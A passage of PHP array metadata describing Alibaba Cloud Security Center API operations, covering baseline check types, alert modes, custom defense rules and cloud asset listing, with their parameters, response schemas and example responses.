'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckStandard'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListCheckStandard', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Standards\\": [\\n {\\n \\"Id\\": 1,\\n \\"ShowName\\": \\"身份权限管理\\",\\n \\"Requirements\\": [\\n {\\n \\"Id\\": 11,\\n \\"ShowName\\": \\"RAM身份认证\\",\\n \\"RiskCheckCount\\": 10,\\n \\"ShowPriorityLevel\\": 1\\n }\\n ],\\n \\"Type\\": \\"IDENTITY_PERMISSION\\",\\n \\"ShowPriorityLevel\\": 1,\\n \\"BindVendor\\": 3\\n }\\n ],\\n \\"RequestId\\": \\"FA91FBDA-***\\"\\n}","type":"json"}]', ], 'ListCheckTypes' => [ 'summary' => 'Queries the types of check items that meet the specified conditions based on the ID of a baseline.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'RiskId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the baseline.'."\n" ."\n" .'> You can call the [DescribeCheckWarningSummary](~~116179~~) operation to query the IDs of baselines.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '34'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Default value: 20. If you leave this parameter empty, 20 entries are returned per page.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The UUID of the server.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the UUIDs of servers.'."\n", 'type' => 'string', 'required' => false, 'example' => '293b07cb-db2d-4f39-941f-b2e4abb8****'], ], [ 'name' => 'ShowChecks', 'in' => 'query', 'schema' => ['description' => 'Whether to query the check item list. The default value is false. Valid values:'."\n" ."\n" .'- **false**: Not Query'."\n" .'- **true**: Query', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The data source. Default value: **default**. Valid values:'."\n" ."\n" .'* **agentless**: The check items of baselines for agentless detection.'."\n" .'* **default**: The check items of baselines for hosts.', 'type' => 'string', 'required' => false, 'example' => 'agentless', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The data returned.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The data returned.', 'type' => 'object', 'properties' => [ 'CheckType' => ['title' => '', 'description' => 'The type of the check item.'."\n", 'type' => 'string', 'example' => 'data_integrity'], 'CheckTypeDisName' => ['title' => '', 'description' => 'The display name of the check item type.'."\n", 'type' => 'string', 'example' => 'Data Integrity'], 'CheckDetails' => [ 'description' => 'The detail of check items.', 'type' => 'array', 'items' => [ 'description' => 'The detail of check items.', 'type' => 'object', 'properties' => [ 'CheckId' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '31', 'title' => ''], 'CheckItem' => ['description' => 'The description of the check item.', 'type' => 'string', 'example' => 'Configure the idle session timeout period.', 'title' => ''], 'AffiliatedRiskTypes' => [ 'description' => 'The list of the baseline categories of attribution.', 'type' => 'array', 'items' => ['description' => 'The Baseline classification of attribution.', 'type' => 'string', 'example' => 'Best security practices', 'title' => ''], 'title' => '', 'example' => '', ], 'AffiliatedRisks' => [ 'description' => 'The list of baselines attribution.', 'type' => 'array', 'items' => ['description' => 'The baseline of attribution.', 'type' => 'string', 'example' => 'Alibaba Cloud Standard - Windows 2012 R2 Security Baseline', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Count' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'Code' => ['description' => 'The response code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'D65AADFC-1D20-5A6A-8F6A-9FA53C0D****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": [\\n {\\n \\"CheckType\\": \\"data_integrity\\",\\n \\"CheckTypeDisName\\": \\"Data Integrity\\",\\n \\"CheckDetails\\": [\\n {\\n \\"CheckId\\": 31,\\n \\"CheckItem\\": \\"Configure the idle session timeout period.\\",\\n \\"AffiliatedRiskTypes\\": [\\n \\"Best security practices\\"\\n ],\\n \\"AffiliatedRisks\\": [\\n \\"Alibaba Cloud Standard - Windows 2012 R2 Security Baseline\\"\\n ]\\n }\\n ]\\n }\\n ],\\n \\"Success\\": true,\\n \\"Count\\": 10,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"D65AADFC-1D20-5A6A-8F6A-9FA53C0D****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'ListCheckTypes', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckTypes'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListCheckTypes', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListClientAlertMode' => [ 'summary' => 'Queries the alert settings of assets. The default alert setting for assets is balance mode. The detailed asset list is returned only in strict mode.', 'methods' => ['get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '192434', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'Mode', 'in' => 'query', 'schema' => [ 'description' => 'The protection mode. Valid values:'."\n" .'- **strict**: Strict mode. Defense mode has a risk of false positives. Use Defense mode during critical event protection periods.'."\n" .'- **balance**: Balance mode. Defense mode detects more suspicious risks while reducing false positives.', 'type' => 'string', 'enum' => ['strict', 'balance'], 'required' => false, 'example' => 'strict', 'title' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7'], 'Data' => [ 'description' => 'The data returned by the request.', 'type' => 'object', 'properties' => [ 'Uuids' => [ 'description' => 'The list of asset UUIDs.', 'type' => 'array', 'items' => ['description' => 'The asset UUID.', 'type' => 'string', 'example' => '0c1714dc-f7a3-4265-8364-7aa3fce8c716', 'title' => ''], 'title' => '', 'example' => '', ], 'Count' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query alert settings', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListClientAlertMode'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListClientAlertMode', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7\\",\\n \\"Data\\": {\\n \\"Uuids\\": [\\n \\"0c1714dc-f7a3-4265-8364-7aa3fce8c716\\"\\n ],\\n \\"Count\\": 5\\n }\\n}","type":"json"}]', ], 'ListClientUserDefineRuleTypes' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => '340D7FC4-D575-1661-8ACD-CFA7BE57****', 'title' => ''], 'UserDefineRuleTypes' => [ 'description' => 'An array consisting of the rule types that are supported.', 'type' => 'array', 'items' => ['description' => 'The rule type that is supported. Valid values:'."\n" ."\n" .'- **1**: Process hash'."\n" ."\n" .'- **2**: Command line'."\n" ."\n" .'- **3**: Process Network'."\n" ."\n" .'- **4**: File Read and Write'."\n" ."\n" .'- **5**: Operation on Registry'."\n" ."\n" .'- **6**: Dynamic-link Library Loading'."\n" ."\n" .'- **7**: File Renaming', 'type' => 'string', 'example' => '1', 'title' => ''], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ListClientUserDefineRuleTypes', 'summary' => 'Queries the supported types of custom defense rules.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListClientUserDefineRuleTypes'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListClientUserDefineRuleTypes', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"340D7FC4-D575-1661-8ACD-CFA7BE57****\\",\\n \\"UserDefineRuleTypes\\": [\\n \\"1\\"\\n ]\\n}","type":"json"}]', ], 'ListClientUserDefineRules' => [ 'summary' => 'Queries custom defense rules.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92326', 'abilityTreeNodes' => ['FEATUREsas2XWKXT'], ], 'parameters' => [ [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the rule.', 'type' => 'string', 'required' => false, 'example' => '规则****', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The types of rules.', 'type' => 'array', 'items' => ['description' => 'The type of the rule. Valid values:'."\n" ."\n" .'- **1**: Process hash'."\n" ."\n" .'- **2**: Command line'."\n" ."\n" .'- **3**: Process Network'."\n" ."\n" .'- **4**: File Read and Write'."\n" ."\n" .'- **5**: Operation on Registry'."\n" ."\n" .'- **6**: Dynamic-link Library Loading'."\n" ."\n" .'- **7**: File Renaming', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '10', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB393***', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '69', 'title' => ''], ], 'title' => '', 'example' => '', ], 'UserDefineRuleList' => [ 'description' => 'An array that consists of the rules.', 'type' => 'array', 'items' => [ 'description' => 'The details about the rule.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the rule. Valid values:'."\n" ."\n" .'- **1**: Process hash'."\n" ."\n" .'- **2**: Command line'."\n" ."\n" .'- **3**: Process Network'."\n" ."\n" .'- **4**: File Read and Write'."\n" ."\n" .'- **5**: Operation on Registry'."\n" ."\n" .'- **6**: Dynamic-link Library Loading'."\n" ."\n" .'- **7**: File Renaming', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Name' => ['description' => 'The name of the rule.', 'type' => 'string', 'example' => '规则****', 'title' => ''], 'SwitchId' => ['description' => 'The switch ID of the rule.', 'type' => 'string', 'example' => 'USER-DEFINE-RULE-SWITCH-TYPE_200****', 'title' => ''], 'Id' => ['description' => 'The ID of the rule.', 'type' => 'integer', 'format' => 'int64', 'example' => '200****', 'title' => ''], 'ActionType' => ['description' => 'The action of the rule. Valid values:'."\n" ."\n" .'- **0**: allow'."\n" ."\n" .'- **1**: block', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Platform' => ['description' => 'The type of the operating system. Valid values:'."\n" ."\n" .'- **windows**: Windows'."\n" ."\n" .'- **linux**: Linux'."\n" ."\n" .'- **all**: all types', 'type' => 'string', 'example' => 'linux', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ListClientUserDefineRules', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListClientUserDefineRules'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListClientUserDefineRules', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB393***\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 69\\n },\\n \\"UserDefineRuleList\\": [\\n {\\n \\"Type\\": 1,\\n \\"Name\\": \\"规则****\\",\\n \\"SwitchId\\": \\"USER-DEFINE-RULE-SWITCH-TYPE_200****\\",\\n \\"Id\\": 0,\\n \\"ActionType\\": 0,\\n \\"Platform\\": \\"linux\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListCloudAssetInstances' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'RegionId', 'in' => 'query', 'schema' => ['description' => 'The ID of the region where the instance resides.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The conditions used to search for assets. This parameter is in JSON format and contains the following fields:'."\n" .'- **name**: the search item.'."\n" .'- **value**: the value of the search item.'."\n" .'- **logicalExp**: the logical relationship between multiple search item values. Valid values:'."\n" .' - **OR**: indicates that multiple search item values have an **OR** relationship.'."\n" .' - **AND**: indicates that multiple search item values have an **AND** relationship.'."\n" .'> You can call the [GetCloudAssetCriteria](~~GetCloudAssetCriteria~~) operation to query the supported search conditions.', 'type' => 'string', 'required' => false, 'example' => '[{\\"name\\":\\"internetIp\\",\\"value\\":\\"192.168\\",\\"logicalExp\\":\\"OR\\"}]', 'title' => ''], ], [ 'name' => 'LogicalExp', 'in' => 'query', 'schema' => ['description' => 'The logical relationship between multiple search conditions. Valid values:'."\n" ."\n" .'- **OR**: indicates that multiple search conditions have an **OR** relationship.'."\n" .'- **AND**: indicates that multiple search conditions have an **AND** relationship.', 'type' => 'string', 'required' => false, 'example' => 'OR', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of rows that can be displayed per page. Maximum value: 100. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'maximum' => '100', 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the current page to return in paginated queries.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '2', 'title' => ''], ], [ 'name' => 'CloudAssetTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of assets of the cloud asset instance.', 'type' => 'array', 'items' => [ 'description' => 'The asset of the cloud asset instance.', 'type' => 'object', 'properties' => [ 'AssetType' => ['description' => 'The type of the cloud asset.'."\n" ."\n" .'> For details, refer to AssetType in the [GetCloudAssetCriteria](~~GetCloudAssetCriteria~~) operation.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '18', 'title' => ''], 'AssetSubType' => ['description' => 'The subtype of the cloud service.'."\n" ."\n" .'> For details, refer to AssetSubType in the [GetCloudAssetCriteria](~~GetCloudAssetCriteria~~) operation.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], 'Vendor' => ['description' => 'The server vendor. Valid values:'."\n" ."\n" .'- **0**: Alibaba Cloud asset'."\n" .'- **1**: Off-cloud asset'."\n" .'- **2**: IDC asset'."\n" .'- **3**, **4**, **5**, **7**: Other cloud assets'."\n" .'- **8**: Lightweight asset', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'CloudAssetQueryData', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The data list queried by keyword.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The query content.', 'type' => 'string', 'required' => false, 'example' => '163.8.8.9', 'title' => ''], 'Operator' => ['description' => 'The query operator. Currently, only INCLUDE is supported.', 'type' => 'string', 'required' => false, 'example' => 'INCLUDE', 'title' => ''], ], 'required' => false, 'description' => '', 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'IsSaleData', 'in' => 'query', 'schema' => ['type' => 'boolean', 'description' => '', 'title' => '', 'example' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the API call was successful. Valid values:'."\n" ."\n" .'- **true**: The API call was successful.'."\n" .'- **false**: The API call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The ID of this request, which is a unique identifier generated by Alibaba Cloud for the request. It can be used to troubleshoot and locate issues.', 'type' => 'string', 'example' => '028CF634-5268-5660-9575-48C9ED6BF880', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in paginated queries.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'PageSize' => ['description' => 'The page size.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'TotalCount' => ['description' => 'The total number of cloud assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '69', 'title' => ''], 'Count' => ['description' => 'The number of data entries displayed on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Instances' => [ 'description' => 'The list of detailed cloud asset information.', 'type' => 'array', 'items' => [ 'description' => 'The detailed cloud asset information.', 'type' => 'object', 'properties' => [ 'RegionId' => ['description' => 'The ID of the region to which the asset instance belongs.', 'type' => 'string', 'example' => 'cn-hanghzou', 'title' => ''], 'Vendor' => ['description' => 'The server vendor. Valid values:'."\n" ."\n" .'- **0**: Alibaba Cloud asset'."\n" .'- **1**: Off-cloud asset'."\n" .'- **2**: IDC asset'."\n" .'- **3**, **4**, **5**, **7**: Other cloud assets'."\n" .'- **8**: Lightweight asset', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AssetType' => ['description' => 'The type of the asset. Valid values:'."\n" ."\n" .'- **0**: Elastic Compute Service (ECS)'."\n" .'- **1**: Server Load Balancer (SLB)'."\n" .'- **3**: ApsaraDB RDS'."\n" .'- **4**: ApsaraDB for MongoDB'."\n" .'- **5**: ApsaraDB for Tair (compatible with Redis)'."\n" .'- **6**: Container Registry'."\n" .'- **8**: Container Service for Kubernetes (ACK)'."\n" .'- **9**: Virtual Private Cloud (VPC)'."\n" .'- **11**: ActionTrail'."\n" .'- **12**: Alibaba Cloud CDN'."\n" .'- **13**: Certificate Management Service (formerly SSL Certificates Service)'."\n" .'- **14**: Apsara Devops'."\n" .'- **16**: Anti-DDoS'."\n" .'- **17**: Web Application Firewall (WAF)'."\n" .'- **18**: Object Storage Service (OSS)'."\n" .'- **19**: PolarDB'."\n" .'- **20**: ApsaraDB RDS for PostgreSQL'."\n" .'- **21**: Microservices Engine (MSE)'."\n" .'- **22**: Apsara File Storage NAS'."\n" .'- **23**: Data Security Center (DSC)'."\n" .'- **24**: Elastic IP Address (EIP)'."\n" .'- **25**: Identity as a Service - EIAM'."\n" .'- **26**: PolarDB-X'."\n" .'- **27**: Elasticsearch', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AssetSubType' => ['description' => 'The subtype of the cloud service.'."\n" .'The asset type-subtype. Valid values:'."\n" ."\n" .'- **0**: Elastic Compute Service (ECS)'."\n" ."\n" .' * **0**: Instance'."\n" .' * **1**: Disk (storage)'."\n" .' * **2**: Security group'."\n" .'- **1**: Server Load Balancer (SLB)'."\n" .' * **0**: Server Load Balancer'."\n" .' * **1**: Application Load Balancer'."\n" .'- **3**: ApsaraDB RDS'."\n" .' * **0**: Instance'."\n" .'- **4**: ApsaraDB for MongoDB'."\n" .' * **0**: Instance'."\n" .'- **5**: ApsaraDB for Tair (compatible with Redis)'."\n" .' * **0**: Instance'."\n" .'- **6**: Container Registry'."\n" .' * **1**: Enterprise Edition'."\n" .' * **2**: Personal Edition'."\n" .'- **8**: Container Service for Kubernetes (ACK)'."\n" .' * **0**: Cluster'."\n" .'- **9**: Virtual Private Cloud (VPC)'."\n" .' * **0**: NAT gateway'."\n" .' * **1**: EIP'."\n" .' * **2**: VPN'."\n" .' * **3**: FLOW_LOG'."\n" .'- **11**: ActionTrail'."\n" .' * **0**: Trail'."\n" .'- **12**: Alibaba Cloud CDN'."\n" .' * **0**: Instance'."\n" .'- **13**: Certificate Management Service (formerly SSL Certificates Service)'."\n" .' * **0**: Certificate'."\n" .'- **14**: Apsara Devops'."\n" .' * **0**: Organization'."\n" .'- **16**: Anti-DDoS'."\n" .' * **0**: Instance'."\n" .'- **17**: Web Application Firewall (WAF)'."\n" .' * **0**: Domain name'."\n" .'- **18**: Object Storage Service (OSS)'."\n" .' * **0**: Bucket'."\n" .'- **19**: PolarDB'."\n" .' * **0**: Cluster'."\n" .'- **20**: ApsaraDB RDS for PostgreSQL'."\n" .' * **0**: Instance'."\n" .'- **21**: Microservices Engine (MSE)'."\n" .' * **0**: Cluster'."\n" .'- **22**: Apsara File Storage NAS'."\n" .' * **0**: File system'."\n" .'- **23**: Data Security Center (DSC)'."\n" .' * **0**: Instance'."\n" .'- **24**: Elastic IP Address (EIP)'."\n" .' * **0**: Anycast EIP'."\n" .'- **25**: Identity as a Service - EIAM'."\n" .' * **0**: Instance'."\n" .'- **26**: PolarDB-X'."\n" .' * **0**: Instance'."\n" .'- **27**: Elasticsearch'."\n" .' * **0**: Instance', 'type' => 'string', 'example' => '0', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the cloud asset instance.', 'type' => 'string', 'example' => 'd-uf60vevzkztnflx7cny5', 'title' => ''], 'InstanceName' => ['description' => 'The instance name of the asset.', 'type' => 'string', 'example' => 'yztest-l***', 'title' => ''], 'CreatedTime' => ['description' => 'The time when the instance was created.', 'type' => 'integer', 'format' => 'int64', 'example' => '1607365213000', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the instance.', 'type' => 'string', 'example' => '1.2.XX.XX', 'title' => ''], 'AlarmStatus' => ['description' => 'Indicates whether the cloud asset has security alerts. Valid values:'."\n" .'- **YES**: Security alerts exist.'."\n" .'- **NO**: No security alerts exist.', 'type' => 'string', 'example' => 'NO', 'title' => ''], 'RiskStatus' => ['description' => 'Indicates whether the cloud asset has security risks. Valid values:'."\n" .'- **YES**: Exists.'."\n" .'- **NO**: Does not exist.', 'type' => 'string', 'example' => 'NO', 'title' => ''], 'AssetTypeName' => ['description' => 'The name of the cloud asset type.', 'type' => 'string', 'example' => 'ECS', 'title' => ''], 'AssetSubTypeName' => ['description' => 'The name of the cloud asset subtype.', 'type' => 'string', 'example' => 'SECURITY_GROUP', 'title' => ''], 'SecurityInfo' => ['description' => 'The security information of the cloud asset.', 'type' => 'string', 'example' => '{"seriousNum":0,"appNum":0,"baselineMedium":0,"remindNum":0,"imageVulNntf":0,"cveNum":0,"vul":0,"uuid":"yuejia-test","emgNum":0,"weakPWNum":0,"imageMaliciousFileRemind":0,"imageBaselineMedium":0,"laterVulCount":0,"cmsNum":0,"imageMaliciousFileSerious":0,"agentlessMalicious":0,"suspNum":0,"imageBaselineHigh":0,"asapVulCount":0,"imageVulLater":0,"agentlessAll":0,"sysNum":0,"containerLater":0,"containerSuspicious":0,"imageBaselineNum":0,"newSuspicious":0,"nntfVulCount":0,"scaNum":0,"containerNntf":0,"health":0,"trojan":0,"suspicious":0,"imageMaliciousFileSuspicious":0,"containerRemind":0,"baselineLow":0,"imageVulAsap":0,"imageBaselineLow":0,"containerAsap":0,"agentlessBaseline":0,"agentlessVulSca":0,"agentlessVulCve":0,"containerSerious":0,"baselineHigh":0,"account":0,"baselineNum":5}', 'title' => ''], 'Tags' => [ 'description' => 'The tag list.', 'type' => 'array', 'items' => ['description' => 'The tag.', 'type' => 'string', 'example' => 'AI', 'title' => ''], 'title' => '', 'example' => '', ], 'VendorUid' => ['description' => 'The account ID of the multi-cloud instance.', 'type' => 'string', 'example' => '123xxx', 'title' => ''], 'VendorUserName' => ['description' => 'The username of the multi-cloud instance.', 'type' => 'string', 'example' => 'testxxx', 'title' => ''], 'SaleCspm' => ['type' => 'integer', 'format' => 'int32', 'description' => '', 'title' => 